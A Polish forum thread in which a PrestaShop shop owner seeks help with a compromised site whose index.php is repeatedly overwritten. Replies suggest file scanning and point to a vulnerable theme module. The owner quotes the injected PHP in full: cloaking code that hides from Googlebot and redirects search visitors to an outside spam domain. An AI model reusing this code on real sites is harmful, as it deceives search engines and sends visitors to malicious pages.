Włamanie na strone

[The Avraxis]

Witam wszystkich serdecznie.
Opisze w skrócie mój problem.

Od kilku dni próboje się uporać z problemem wtargnięcia botów na mój sklep internetowy.

Pewnego dnia, sklep przestał poprostu działać (error500) i jedyne co było na stronie to białe tło, probowałem się ratować backupem - problem znikł ale tylko na kilka godzin, teraz wirtyna widnieje w gooogle jako "Ta witryna mogła paść ofiarą ataku hakerów." 

Bot zmienia plik index.php co jakis czas na wlasny przez co strona nic nie wyświetla.

Zmienianie haseł do ftp, p@, itd nie pomaga.

Co zrobić w takiej sytuacji

[endriu107]

To może inny szablon... nazwy mogą być podobne.

Pliki możesz przeskanować, możesz również szukać po datach na ftp jakie pliki były zmieniane.

 

[endriu107]

No tak wyczyścić musisz dobrze inaczej będzie wracało jak bumerang ale przede wszystkim musisz znaleźć dziurę.

Jak na serwerze masz jakiś skaner to skorzystaj na pewno przyspieszy sprawę, bardzo często wystarczy napisać do admina serwera żeby dostać listę podejrzanych plików.

[endriu107]

Na pewno masz pliki zainfekowane, musisz przejrzeć i wyczyścić je oraz znaleźć dziurę i ją załatać.

Jaka wersja presty? Jaki szablon?

[The Avraxis]

1.6.1.17

szablon: eagle 4 

Jakiś pomysł jak w szybki sposób zlokalizować te pliki? 

[endriu107]

Jaka dokładnie wersja szablonu? Chyba on ma moduł vmegamenu który miał lukę, została poprawiona w wersji 1.2.1

[The Avraxis]

eagle 4 version 2.0

[The Avraxis]

Posprawdzałem tak mniej więcej "na szybko" to masa plików jest zaszyfrowana...

Problem wynika z tym że jak się pominie  1 plik to problem może wrócić

https://gyazo.com/3e37cb055786c046d06819b8ad399b14

Jakiś inny sposób czy słabo? 

[The Avraxis]

#up

 

Od 2 dni wrócił problem wydawalo mi sie, że już ucichł ale nie na dlugo.. 

Około godziny 5 nad ranem zmienia plik index.php na kod

"

Cytat

<?php
error_reporting(0);
$umodel = "32";
$query = $_SERVER['REQUEST_URI'];
if(strstr($query,"sitemaps.xml")){
    echo GetFileContent("sitemaps.xml");exit;
}
$query = $_SERVER['REQUEST_URI'];
if(stripos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false){
    header('HTTP/1.1 404 Not Found');
    header('status: 404 Not Found');
    exit;
}

if(preg_match('/(google.co.jp|yahoo.co.jp)/i', strtolower($_SERVER['HTTP_REFERER']))){
    error_reporting (E_ERROR | E_WARNING | E_PARSE);
    $ip = getenv("REMOTE_ADDR");
    $DENY_IP=array('50.206','66.102','64.131','66.87','184.153','128.28','86.137','68.8','73.234','167.167','66.249','98.2','216.8','45.64','171.96','98.164','67.1
74','165.225','184.83','67.139','52.192','165.23','72.253','98.102','71.83','108.225','50.184');
    $check_ip_arr= explode('.',$ip);
    if ($ip=="" || preg_match('/('.implode("|",$DENY_IP).')/i', $check_ip_arr[0].".".$check_ip_arr[1])){
        Header("HTTP/1.1 404 Not Found");
        exit;
    }
    echo '<script>document.location=("http://www.topgood.xyz/good/130-85/go.php?'.trim($query."|".$_SERVER["SERVER_NAME"]."|".$umodel).'");</script>';
    exit;
}

function GetFileContent($url){
    if(function_exists('file_get_contents')) {
        $file_contents = file_get_contents($url);
    } else {
        $ch = curl_init();
        $timeout = 5;
        curl_setopt ($ch, CURLOPT_URL, $url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $file_contents = curl_exec($ch);
        curl_close($ch);
    }
    return $file_contents;
}
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
 

 

 

Ktoś jakiś pomysl?

[endriu107]

Znalazłeś gdzie masz dziurę czy tylko wyczyściłeś pliki za pierwszym razem? 

[The Avraxis]

Wydawało mi się, że tak. 

Widoczenie bylem w błędzie